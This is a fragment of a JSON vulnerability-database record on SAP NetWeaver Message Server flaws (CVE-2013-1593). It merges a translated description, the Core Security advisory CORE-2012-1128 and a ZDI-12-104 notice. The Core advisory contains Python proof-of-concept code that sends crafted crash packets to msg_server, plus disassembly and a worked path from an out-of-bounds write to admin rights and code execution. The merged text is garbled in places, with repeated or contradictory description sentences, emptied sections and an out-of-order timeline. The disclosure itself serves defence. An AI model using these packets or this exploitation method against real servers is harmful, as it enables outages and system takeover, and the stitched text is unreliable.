        "data": "A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n   . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n   . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n    packet = struct.pack(\"!I\", len(packet)) + packet\n    sock.send(packet)\n\ndef receive(sock):\n    length = sock.recv(4)\n    (length, ) = struct.unpack(\"!I\", length)\n    data = \"\"\n    while len(data)\u003clength:\n        data+= sock.recv(length)\n    return (length, data)\n\ndef initialize_connection(hostname, port):\n\n    # Connect\n    print \"[*] Connecting to\", hostname, \"port\", port\n    connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    connection.connect((hostname, port))\n\n    # Send initialization packet\n    print \"[*] Conected, sending login request\"\n\n    init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    init+= \u0027\\x04\u0027 # version\n    init+= \u0027\\x00\u0027 # errorno\n    init+= client_string # toname\n    init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n    init+= client_string # fromname\n    init+= \u0027\\x00\\x00\u0027 # padd\n    send_packet(connection, init)\n\n    # Receive response\n    print \"[*] Receiving login reply\"\n    (length, data) = receive(connection)\n\n    # Parsing login reply\n    server_name = data[4+64:4+64+40]\n\n    return connection\n\n# Main PoC body\nconnection = initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER   struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid       dd ?\n00000008 serviceid       dd ?\n0000000C groupid         dd ?\n00000010 nodetype        db ?\n00000011                 db ? ; undefined\n00000012                 db ? ; undefined\n00000013                 db ? ; undefined\n00000014 totallength     dd ?\n00000018 currentlength   dd ?\n0000001C currentoffset   dd ?\n00000020 totalblocks     db ?\n00000021 currentblock    db ?\n00000021\n00000022                 db ? ; undefined\n00000023                 db ? ; undefined\n00000024 messagetype     dd ?\n00000028 MSJ2EE_HEADER   ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0    ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0    j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0    ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0    ; _MsJ2EE_AddStatistics+4Co ... \n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov     edi, [ebp+pJ2eeHeader]\nmov     eax, [edi+MSJ2EE_HEADER.serviceid]              ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor     ecx, ecx\ncmp     dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea     esi, [eax+eax*8]\nlea     esi, j2ee_stat_services.totalMsgCount[esi*8]    ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000                                         ; XREF:\n.data:j2ee_stat_totalr\n00000000                                         ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount   dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000                                         ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength  dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008                                         ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010                                         ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength       dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018                                         ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020                                         ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028                                         ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply      dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030                                         ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ?                 ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038                                         ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ?                 ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040                                         ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359                 movzx   eax, [ebp+msiflag]\n.text:0044D35D                 sub     eax, 0Ch\n.text:0044D360                 jz      short loc_44D37C\n.text:0044D362                 sub     eax, ebx\n.text:0044D364                 jnz     short loc_44D39D\n.text:0044D366                 cmp     [ebp+msflag], 2\n.text:0044D36A                 jnz     short loc_44D374\n.text:0044D36C                 add     [esi+40h], ebx  ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F                 adc     [esi+44h], ecx\n.text:0044D372                 jmp     short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374                 add     [esi+38h], ebx  ; iflag=0xd,\nflag=1 =\u003e add 1 to [esi+0x38]\n.text:0044D377                 adc     [esi+3Ch], ecx\n.text:0044D37A                 jmp     short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C                 mov     al, [ebp+msflag]\n.text:0044D37F                 cmp     al, 3\n.text:0044D381                 jnz     short loc_44D38B\n.text:0044D383                 add     [esi+30h], ebx  ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386                 adc     [esi+34h], ecx\n.text:0044D389                 jmp     short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B                 cmp     al, 2\n.text:0044D38D                 jnz     short loc_44D397\n.text:0044D38F                 add     [esi+28h], ebx  ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392                 adc     [esi+2Ch], ecx\n.text:0044D395                 jmp     short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397                 add     [esi+20h], ebx  ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A                 adc     [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7                 add     [esi],\nebx                               ;add 1 to [esi]\n.text:0044D3B9                 adc     dword ptr [esi+4], 0\n.text:0044D3BD                 mov     eax,\n[edi+MSJ2EE_HEADER.totallength]     ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0                 cdq\n.text:0044D3C1                 add     [esi+8],\neax                             ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s         struc ; (sizeof=0x538, standard type)\n00000000                                         ; XREF: .data:dummy_clientr\n00000000 client_type     dd ?                    ; enum MS_CLIENT_TYPE\n00000004 stat            dd ?                    ; enum MS_STAT\n00000008 connection_ID   dd ?\n0000000C status          db ?\n0000000D dom             db ?                    ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed   db ?\n0000000F                 db ? ; undefined\n00000010 name            dw 40 dup(?)\n[...]\n00000534 _padding        db 4 dup(?)\n00000538 MSADM_s         ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC:                                                  ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n   ; MsSLoginClient+B26j\n.text:004230DC                 cmp     byte ptr [edi+0Eh],\n0                ; privileged client?\n.text:004230E0                 jnz     short\nloc_4230EA                     ; if yes, jump\n.text:004230E2                 mov     al, byte ptr\nms_admin_allowed        ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7                 mov     [edi+0Eh],\nal                        ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ?                   ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0                                         ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0                                         ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0                                         ;\n_MsJ2EE_AddStatistics+4Co ... \n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n   1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n   2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. \n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0                                              offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0                 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\                    ;\u003c-- we can overwrite this one\n.data:0087DED0                                              offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3:                             ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3                 lea     esi, [edi+edi*2]\n.text:00404DB6                 mov     edi, [ebp+pvalue]\n.text:00404DB9                 add     esi, esi\n.text:00404DBB                 mov     edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2                 add     esi, esi\n.text:00404DC4                 push    edi\n.text:00404DC5                 push    pname\n.text:00404DC6                 call    edx              ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n   1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n   2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n    crash+= \"\\x00\\x00\\x00\\x01\"\n    crash+= \"\\xff\\xff\\xff\\xff\"\n    crash+= \"\\x00\\x00\\x00\\x00\"\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+= \"AD-EYECATCH\\x00\"\n    crash+= \"\\x01\\x01\"\n    crash+= \"%11d\" % 104\n    crash+= \"%11d\" % 1\n    crash+= \"\\x15\\x00\\x00\\x00\"\n    crash+= \"\\x20\\x00\\x00\\xc8\"\n    crash+= \"LALA\" + \u0027 \u0027*(20-4)\n    crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n    crash+= \" \"*36\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n. 2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013. 2012-12-10:\nCore sends an advisory draft with technical details and a PoC. 2012-12-11:\nThe SAP team confirms the reception of the issue. 2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012. \nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:\nSAP notifies Core that they will be contacted if tests fails in order to\nre-schedule the advisory publication. 2013-01-22:\nFirst release date missed. 2013-01-28:\nSAP notifies that they are still confident with releasing a security\nnote and patches on Feb 12th as planned. 2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosing on Feb 12th. Core also asks additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to security bulletin, CVEs, and patches in\norder to verify if those patches effectively fix the reported flaws. 2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVE were assigned to them. Those\nvulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks additional information regarding the affected and\npatched version numbers. 2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nnote will provide further information regarting this vulnerability. 2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx. \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603. \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. \n\n[5] SAP Security notes Feb 2012\nhttps//service.sap.com/sap/support/notes/1649840. \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nSAP\n\n- -- Affected Products:\nSAP NetWeaver\n\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n- -- Vendor Response:\nSAP has issued an update to correct this vulnerability. More details can be\nfound at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1\n0-eea7-ceb666083a6a#section40\n\n\n- -- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n- -- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n    http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n    http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n    http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t\nuAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E\n1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR\nXFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3\nJqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6\nwGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA==\n=t/ct\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-1593"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007128"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1593"
          },
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          }
        ],
        "trust": 5.49
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-1593",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "57956",
            "trust": 2.0
          },
          {
            "db": "SECTRACK",
            "id": "1028148",
            "trust": 1.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "trust": 0.8
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112",
            "trust": 0.8
          },
          {
